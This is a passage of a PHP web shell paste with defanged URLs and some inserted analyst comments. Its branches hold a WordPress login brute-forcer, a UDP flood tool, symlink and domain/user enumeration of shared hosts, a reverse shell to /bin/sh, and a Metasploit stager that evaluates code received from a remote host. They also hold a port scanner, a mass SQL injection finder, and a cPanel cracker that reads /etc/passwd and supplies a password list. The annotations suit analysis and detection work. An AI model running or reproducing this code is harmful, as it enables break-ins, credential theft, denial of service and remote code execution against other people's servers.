6668<?php if($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("hxxp://","hxxps://","www."),"",trim($host)); $host = "hxxp://".$host; $wpAdmin = $host.'/wp-admin/'; if(!url_exists($host."/wp-login.php")) {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;} foreach($usernames_explode as $username) { foreach($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php'); curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt"); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_POST,TRUE); curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1"); $login = curl_exec($ch); if(eregi ("profile.php",$login) ) { $hacked = 1; echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>"; ob_flush();flush();break; } } if($hacked == 1){break;} } if($hacked == 0) {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();} } } else {echo "<p><font color='red'>All fields are Required ! </font></p>";} } ?>
6669</td></tr>
6670</table></form></center>
6671<?php
// Helper functions called by the 'wpbrute' branch that precedes this line.

// url_exists($strURL): returns true only when a cURL request to $strURL ends with status 200.
// Analyst notes:
//   - `CURLINFO_hxxp_CODE` is not a cURL constant as written; the paste's http -> hxxp
//     defanging has altered identifiers as well as URLs, so signatures keyed on the usual
//     constant name will not match this copy.
//   - CURLOPT_HEADERFUNCTION names 'curlHeaderCallback', which is not defined in the
//     visible part of the file.
//   - CURLOPT_FAILONERROR makes HTTP statuses of 400 and above count as a failed transfer.
//   - CURLOPT_RETURNTRANSFER is not set and the curl_exec() result is discarded.
function url_exists($strURL) { $resURL = curl_init(); curl_setopt($resURL, CURLOPT_URL, $strURL); curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1); curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); curl_setopt($resURL, CURLOPT_FAILONERROR, 1); curl_exec ($resURL); $intReturnCode = curl_getinfo($resURL, CURLINFO_hxxp_CODE); curl_close ($resURL); if ($intReturnCode != 200){return false;} else{return true ;} }
// filter($string): returns $string with slashes stripped when magic quotes are on, otherwise
// unchanged. get_magic_quotes_gpc() was removed in PHP 8, which dates the sample; the function
// performs no validation or escaping despite its name.
function filter($string) { if(get_magic_quotes_gpc() != 0){return stripslashes($string); } else{return $string; } }
// RemoveLastSlash($host): when the last '/' found by strrpos() is the final character,
// returns $host without it; otherwise returns $host unchanged.
function RemoveLastSlash($host) { if(strrpos($host, '/', -1) == strlen($host)-1) {return substr($host,0,strrpos($host, '/', -1));} else{return $host;} }
// Closes the 'wpbrute' branch; the next branch is selected by ?x=dos.
echo "</p>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')) { ?>
6672<form action="?y=<?php echo $pwd; ?>&x=dos" method="post">
6673<center><br><br><br>
6674Your IP: <font color="red"><b><?php echo $my_ip; ?></b></font> (Don't DDOS yourself noob)<br><br>
6675<table class="tabnet" style="width:333px;padding:0 1px;">
6676<th colspan="5">DDOS Tool</th>
6677<tr><tr><td>IP Target</td><td>:</td>
6678<td><input type="text" class="inputz" name="ip" size="48" maxlength="25" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
6679</td></tr>
6680<tr><td>Time</td><td>:</td>
6681<td><input type="text" class="inputz" name="time" size="48" maxlength="25" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
6682</td></tr>
6683
6684<tr><td>Port</td><td>:</td>
6685<td><input type="text" class="inputz" name="port" size="48" maxlength="5" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
6686</td></tr></tr></table></b><br>
6687<input type="submit" class="inputzbut" name="fire" value=" Firee !!! ">
6688<br><br>
6689<center>
6690After initiating the DDOS attack, please wait while the browser loads.
6691</center>
6692
6693</form>
6694</center>
6695<?php $submit = $_POST['fire']; if (isset($submit)) { $packets = 0; $ip = $_POST['ip']; $rand = $_POST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_POST['time']; $time = time(); print "Flooded: $ip on port $rand <br><br>"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { ?>
6696<form action="?y=<?php echo $pwd; ?>&x=symlink" method="post">
6697
6698<?php @set_time_limit(0); echo "<br><br><center><h1>--==[ Symlink ]==--</h1></center><br><br><center><div class=content>"; @mkdir('sym',0777); $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; $malay = '\.my'; $china = '\.cn'; $japan = '\.jp'; $austr = '\.au'; $porn = '\.xxx'; $as = '\.uk'; $calfn = '\.ca'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) { $name = "<div style=' 
color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>'; } echo "
6699<tr>
6700
6701<td>
6702<div class='dom'><a target='_blank' href=hxxp://www.".$string[1][0].'/>'.$name.' </a> </div>
6703</td>
6704
6705<td>
6706'.$UID['name']."
6707</td>
6708
6709<td>
6710<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
6711</td>
6712
6713</tr></div> "; flush(); } } } } echo "</center></table>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')) { ?>
6714<form action="?y=<?php echo $pwd; ?>&x=domain" method="post">
6715
6716<?php
// Branch ?x=domain: lists domains hosted on the same server together with the local account
// that owns each one.
// Steps visible below:
//   1. Reads /etc/named.conf in full; stops with an error message if it cannot be read.
//   2. Collects every name matching the pattern named/<name>.db and de-duplicates the list.
//   3. For each name, looks up the owner of /etc/valiases/<name> with fileowner() and
//      posix_getpwuid(), and prints the domain next to that account name.
// NOTE(review): the /etc/valiases layout is associated with cPanel-style shared hosting; confirm
// against the affected host.
// Detection and hardening: a web-server worker opening /etc/named.conf or walking /etc/valiases
// is unusual for a site's own code; open_basedir and file permissions that keep these paths
// unreadable to site accounts stop the enumeration.
// The gutter numbers (6717-6718) sit inside the echoed table string in this paste.
echo '<br><br><center><h1>--==[ Local Domain Viewer ]==--</h1></center><br><br><div class=content>'; $file = @implode(@file("/etc/named.conf")); if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); } preg_match_all("#named/(.*?).db#",$file ,$r); $domains = array_unique($r[1]); { echo "<table align=center border=1 width=59% cellpadding=5>
6717<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
6718<tr><td>Domain</td><td>User</td></tr>"; foreach($domains as $domain){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain)); echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>"; } echo "</table>"; } echo '</div>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'tool')) { ?>
6719<form action="?y=<?php echo $pwd; ?>&x=tool" method="post">
6720<?php error_reporting(0); function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));} $s_my_ip = gethostbyname($_SERVER['hxxp_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "<br><br><br><center><table><div class='mybox' align='center'><td><h2>Reverse shell ( php )</h2><form method='post' actions='?y=<?php echo $pwd;?>&x='tool'><table class='tabnet'><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' name='rstarget4' value='".$rstarget4."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='sqlportb4' value='".$rsportb4."' /></td></tr></table><input type='submit' name='xback_php' class='inputzbut' value='connect' style='width:120px;height:30px;margin:10px 2px 0 2px;' /><input type='hidden' name='d' value='".$pwd."' /></form></td><td><hr color='#4C83AF'><td><td><form method='POST'><table class='tabnet'><h2>Metasploit Connection </h2><tr><td style='width:110px;'>Your IP</td><td><input style='width:100%;' class='inputz' type='text' size='40' name='yip' value='".$my_ip."' /></td></tr><tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' size='5' name='yport' value='443' /></td></tr></table><input class='inputzbut' type='submit' value='Connect' name='metaConnect' style='width:120px;height:30px;margin:10px 2px 0 2px;'></form></td></div></center></table><br><br />"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". 
$ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, 
$read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);} if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;} } elseif(isset($_GET['x']) && ($_GET['x'] == 'whois')) { ?>
6721 <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
6722 <?php @set_time_limit(0); @error_reporting(0); function sws_domain_info($site) { $getip = @file_get_contents("hxxp://networktools.nl/whois/$site"); flush(); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("hxxp://networktools.nl/asinfo/$site"); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("hxxp://networktools.nl/reverseip/$site"); $ip = @findit($getip,'<pre>','</pre>'); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("hxxp://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains"); $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">'); return $ip; flush(); } function sws_port_scan($ip) { $list_post = array('80','21','22','2082','25','53','110','443','143'); foreach ($list_post as $o_port) { $connect = @fsockopen($ip,$o_port,$errno,$errstr,5); if($connect) { echo " $ip : $o_port ??? <u style=\"color: #FF0000\">Open</u> <br /><br />"; flush(); } } } function findit($mytext,$starttag,$endtag) { $posLeft = @stripos($mytext,$starttag)+strlen($starttag); $posRight = @stripos($mytext,$endtag,$posLeft+1); return @substr($mytext,$posLeft,$posRight-$posLeft); flush(); } echo '<br><br><center>'; echo '
6723 <br />
6724 <div class="sc"><form method="post"><table class="tabnet">
6725 <tr><th colspan="5">Website Whois</th></tr>
6726 <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#FF0000;background-color:#000000" class="inputz" value="site.com" />   <input class="inputzbut" type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !" /></td></tr>
6727 </table></form></div>'; if(isset($_POST['scan'])) { $site = @htmlentities($_POST['site']); if (empty($site)){die('<br /><br /> Not add IP .. !');} $ip_port = @gethostbyname($site); echo "
6728 <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
6729 <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
6730 <div class=\"ru\"> <br /><br /><pre>
6731 "; echo "".sws_port_scan($ip_port)." </pre></div> "; flush(); echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
6732 <div class=\"ru\">
6733 <pre>".sws_domain_info($site)."</pre></div>"; flush(); echo "
6734 <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
6735 <div class=\"ru\">
6736 <pre>".sws_net_info($site)."</pre> </div>"; flush(); echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
6737 <div class=\"ru\">
6738 <pre>".sws_sup_dom($site)."</pre> </div>"; flush(); echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
6739 <div class=\"ru\">
6740 <pre>".sws_site_ser($site)."</pre> </div>
6741 <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>"; flush(); } echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'color')) { ?>
6742 <form action="?y=<?php echo $pwd; ?>&x=color" method="post">
6743 <center>
6744 <object border="0" classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" codebase="hxxp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="500" id="obj1" width="500"> <param value="hxxp://www.2createawebsite.com/build/color.swf" name="movie"><param value="High" name="quality"><embed pluginspage="hxxp://www.macromedia.com/go/getflashplayer" quality="High" src="hxxp://www.2createawebsite.com/build/color.swf" name="obj1" type="application/x-shockwave-flash" height="500" width="500"> </object></center>
6745 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'telin')) { ?>
6746 <form action="?y=<?php echo $pwd; ?>&x=telin" method="post">
6747 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://speedtest.telin.co.id/" width="100%"></iframe>
6748 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'spoison')) { ?>
6749 <form action="?y=<?php echo $pwd; ?>&x=spoison" method="post">
6750 <body bgcolor=black><div align=center><font color=white size=3 face="comic sans ms">
6751<form method=post>
6752<font color=white font size=5>--==[[<input style="color:#000000" type=submit name=hosted value="reverse ip(websites on server)">||>>++++<<||
6753<input style="color:#000000" type=submit name=sql value="bing based sql injection finder">||>>++++<<||<input style="color:#000000" type=submit name=scan value="mass SQLI finder">]]==--</font><font size=4><p>
6754 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|||||<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<</font><p>
6755</form>
6756
6757 <?php
/*
 * Analyst note (annotation only; the code below is unchanged).
 * Helper functions for the shell's "spoison" branch: marker-based string
 * extraction, host extraction, a probe that searches a response for
 * database error text, and a Bing result fetcher. "hxxp" in the URLs is
 * presumably the paste's defanged spelling of the scheme.
 * error_reporting(0) silences PHP diagnostics for the rest of the request.
 */
error_reporting(0);
/*
 * entre2v2(): returns the trimmed text that follows the first occurrence of
 * $marqueurDebutLien in $text, cut at the next $marqueurFinLien.
 */
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[1]); $ar=trim($ar1[0]); return $ar; }
/*
 * getHost(): parses the trimmed address with parse_url() and returns the
 * host component, or the first path segment when no host was parsed.
 */
function getHost($Address) { $parseUrl = parse_url(trim($Address)); return trim($parseUrl[host] ? $parseUrl[host] : array_shift(explode('/', $parseUrl[path], 2))); }
/*
 * sql(): rewrites every "=" in $tu to "='" and appends the literal "<br>",
 * requests that URL with cURL (response headers included, 5 second connect
 * timeout), then searches the response case-insensitively for a fixed list
 * of MySQL and PHP error phrases and prints one of two messages.
 * Defender view: the request has a single quote directly after each "=" and
 * ends in "<br>", which is distinctive in access logs and WAF rules; this
 * function sets no User-Agent option. Applications that use parameterised
 * queries and never return database or PHP error text to the client give
 * the pattern match nothing to find.
 */
function sql($tu) { $ch = curl_init(); $url=str_replace("=","='",$tu)."<br>"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); $content=$result['EXE'] = curl_exec($ch); if(preg_match("/You have an error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$content)) { echo "<div align=center><table width=90% border=1 ><tr><td align=center><font color=red size=4 face='comic sans ms'> i got sql injection symtoms in website <font color=white size=4 face='comic sans ms'> $tu </font> </font></td></tr></table>"; } else { echo "<br>bhai ji check link manually for vulnerability existance :( <br>"; } }
/*
 * e(): requests a Bing search for "ip:" followed by $i, plus the term $q, at
 * result offset $p with a 0 appended, sending a fixed Referer and a fixed
 * Firefox 3.0.8 User-Agent, and returns the raw response including headers.
 * Defender view: search-engine requests originating from a web server
 * process are unusual and worth alerting on in egress or proxy logs.
 */
function e($i,$q,$p) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'hxxp://www.bing.com/search?q=ip%3A' .$i . '+'.$q.'&go=&qs=n&first=' . $p.'0&FORM=PERE'); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'hxxp://www.bing.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); return $result['EXE'] = curl_exec($ch); curl_close($ch); } ?>
6758
6759
6760<?php if(isset($_POST['scan'])) { ?>
6761 <form method=post><font color=white size=4 face="comic sans ms">
6762Target server ip/website: <br>||<br>\/<br><input style="color:#000000" type=text name=serverip value=127.0.0.0> <p>
6763<input style="color:#000000" type=submit name=billu value="extract domains for scanning"><p>
6764</form>
6765<?php } ?>
6766
6767<?php error_reporting(0); if(isset($_POST['billu'])) { $iw=$_POST['serverip']; $rr=ereg_replace("(hxxps?)://", "", $iw); $web= ereg_replace("www.", "", $rr); echo "<font color=#ff9933>server ip is ".gethostbyname($web)."</font>"; $server=gethostbyname($web); echo "</font><br>###############################################<br>"; echo "<font size=4 color=white>list of hosted website is given below...... </font><br>"; $var=0; $alllinks=array(); do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($server,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); $li=ereg_replace("www.", "", $URL); array_push($alllinks,$li); } } } else{ $r=0; } $var++; }while($r!='0'); $lastarray=array_unique($alllinks); echo "<form method=post>"; echo "<textarea rows=10 cols=50 name=a>"; foreach($lastarray as $sw){ echo $sw."\n"; } echo "</textarea>"; echo "<p><input style=\"color:#000000\" type=submit name=msqli value=\"start SQLI scanning\"></form>"; } ?>
6768
6769<?php if(isset($_POST['msqli'])) { $a=explode("\n",$_POST['a']); foreach($a as $sa) { echo $URL=trim($sa); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$URL ); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_REFERER, 'hxxp://www.google.com/'); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); $result['ERR'] = curl_error($ch); curl_close($ch); if ( empty( $result['ERR'] ) ) { if(preg_match_all('/<a\s+href=["\']([^"\']+)["\']/i', $result['EXE'],$i, PREG_SET_ORDER)) { foreach($i as $match) { $text1=$match[1] ."<br>"; echo $domain=getHost($URL)."/".$text1; if(preg_match("/=/i",$domain)) { sql($domain); } else { echo "<br><font color=white> link dont have dynamic parameter<br>"; } }}} } } ?>
6770
6771<?php if(isset($_POST['hosted'])) { ?>
6772 <form method=post>
6773<font size=4>website/ip</font> <br>||<br>\/<br> <input type=text name=ip >
6774<p><input type=submit name=s value="extract hosted websites"></form>
6775<?php } ?>
6776
6777
6778<?php set_time_limit(0); error_reporting(0); if(isset($_POST['s'])) { $iw=$_POST['ip']; $rr=ereg_replace("(hxxps?)://", "", $iw); $web= ereg_replace("www.", "", $rr); echo "<font color=#ff9933>server ip is ".gethostbyname($web)."</font>"; $server=gethostbyname($web); echo "</font><br>###############################################<br>"; echo "<font size=4 color=white>list of hosted website is given below...... </font><br>"; $var=0; do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($server,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); $URL=gethost($domain); echo "<br><a href=hxxp://".$URL.">".$URL."</a>"; }} } else{ $r=0; } $var++; }while($r!='0'); } ?>
6779
6780
6781
6782<?php if(isset($_POST['sql'])) { ?>
6783
6784 <form method=post><font color=white size=4 face="comic sans ms">
6785Target server ip/website: <input style="color:#000000" type=text name=ip value=127.0.0.0>  
6786<font color=white size=4 face="comic sans ms"><p>
6787 query bhai ji =)) ==><input style="color:#000000" type=text name=query value=.php?><p>
6788<input style="color:#000000" type=submit name=ssm value="Chal billu XD">
6789</form>
6790<?php } ?>
6791
6792<?php error_reporting(0); set_time_limit(0); if(isset($_POST['ssm'])) { $wi=$_POST['ip']; $rr=ereg_replace("(hxxps?)://", "",$wi); $server= ereg_replace("www.", "", $rr); echo "<font size=4>server under scaning ==> ". $sr=gethostbyname($server); echo "   query ==> ".$qu=trim($_POST['query']); echo "</font><br>=====================================================================<br>"; $var=0; do { $pgs=$var; $link="hxxp://www.bing.com/search?q=ip%3A".$sr . "+".$qu."&go=&qs=n&first=" . $pgs."0&FORM=PERE"; $uurl=file_get_contents($link); if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl)) { $r=1; $pdata=e($sr,$qu,$pgs); if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) { foreach($i as $match) { $total=$match[0]."\n" ; $domain=entre2v2($total,"a href=\"","\" h=\"ID="); echo "<br><font color=red size=4><b>testing link </b></font>".$domain; if(preg_match("/=/i",$domain)) { sql($domain); } else { echo "<br><font color=white> link dont have dynamic parameter<br>"; } } } } else{ $r=0; } $var++; }while($r!='0'); } ?>
6793 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'rd')) { ?>
6794 <form action="?y=<?php echo $pwd; ?>&x=rd" method="post">
6795 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/rd.php" width="100%"></iframe>
6796 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'configkiller')) { ?>
6797 <form action="?y=<?php echo $pwd; ?>&x=configkiller" method="post">
6798 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/configkil.php" width="100%"></iframe>
6799 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcr')) { ?>
6800 <form action="?y=<?php echo $pwd; ?>&x=whmcr" method="post">
6801<center><form method=post><font color=red size=3 face="comic sans ms">username extractor<br>
6802 <input style="font-size:normal;color:#000000" type=submit name=passx value="cat /etc/passwd"> <input style="font-size:normal;color:#000000" type=submit name=passb value="/etc/passwd bypasser">
6803 </form><p>
6804 <?php if(isset($_POST['passb'])) { ?>
6805<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/group"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea>
6806<?php } ?>
6807<form method=post>
6808 <font color=white size=2 face="comic sans ms">
6809 website/ip address:<input style="font-size:normal;color:#000000" type=text name=target value="localhost">
6810 Port:<input style="font-size:normal;color:#000000" type=text name=port value=2082>
6811 </form><p><table width=30%><td align=center>user list</td><td align=center>passwords</td></table>
6812 <?php if(isset($_POST['passx'])) { ?>
6813<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea>
6814<?php } else{ ?>
6815 <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ></textarea>
6816
6817<?php } ?> <textarea style="background:black;color:white" rows=20 cols=25 name=passwords><?php echo "brazil\admin1234567890\brasil123\brazil1234567890\br1234567890\f32ws4f\cyberroulette\nrootactive\nadministrator\npakistan\npak123\npak12345\npakistan786\npak786\n786\n786786\npak123456\npak1234\nallah786\nallahu\nallahisgreat\npakistani\npak4ever\nallah\nallah123\nallah1234\nallah12345\nallah123456\nallah911\npakbest\nadmin786\nadmin@786\nsql@786\nPakistan\nPak\nPakistan123\nPakistan1234\nPakistan786\nPak786";?></textarea><br><br>
6818name of the file in which you want to store cracked panel info==> <input style="font-size:normal;color:#000000" type=text name=crack value=crack.txt>
6819<p><input style="font-size:normal;color:#000000" type=submit name=cracking value="lets hex this shit XD" /></form></p><br>
6820<?php
/*
